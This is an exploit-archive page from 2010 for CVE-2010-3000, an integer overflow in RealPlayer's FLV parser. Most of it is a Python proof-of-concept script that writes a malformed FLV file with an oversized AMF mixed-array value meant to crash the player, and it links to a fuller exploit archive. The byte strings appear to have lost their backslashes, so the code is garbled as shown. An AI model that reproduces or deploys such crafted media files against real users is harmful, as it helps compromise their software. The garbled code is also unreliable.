RealPlayer FLV Parsing Integer Overflow
Posted on 13 September 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>RealPlayer FLV Parsing Integer Overflow</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>======================================= RealPlayer FLV Parsing Integer Overflow ======================================= Title : RealPlayer FLV Parsing Multiple Integer Overflow Version : RealPlayer SP 1.1.4 Analysis : http://www.abysssec.com Vendor : http://www.real.com Impact : High Contact : shahin [at] abysssec.com , info [at] abysssec.com Twitter : @abysssec CVE : CVE-2010-3000 ''' # POC for CVE-2010-3000 # http://www.exploit-db.com/moaub-13-realplayer-flv-parsing-multiple-integer-overflow/ # http://www.exploit-db.com/sploits/moaub-13-exploit.zip import sys def main(): flvHeader = 'x46x4Cx56x01x05x00x00x00x09' flvBody1 = 'x00x00x00x00x12x00x00x15x00x00x00x00x00x00x00x02x00x0Ax6Fx6Ex4Dx65x74x61x44x61x74x61x08' HX_FLV_META_AMF_TYPE_MIXEDARRAY_Value = "x07x50x75x08" # if value >= 0x7507508 --> crash flvBody2 = "x00x00x09x00x00x00x20" flv = open('poc.flv', 'wb+') flv.write(flvHeader) flv.write(flvBody1) flv.write(HX_FLV_META_AMF_TYPE_MIXEDARRAY_Value) flv.write(flvBody2) flv.close() print '[-] FLV file generated' if __name__ == '__main__': main() # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-09-13]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
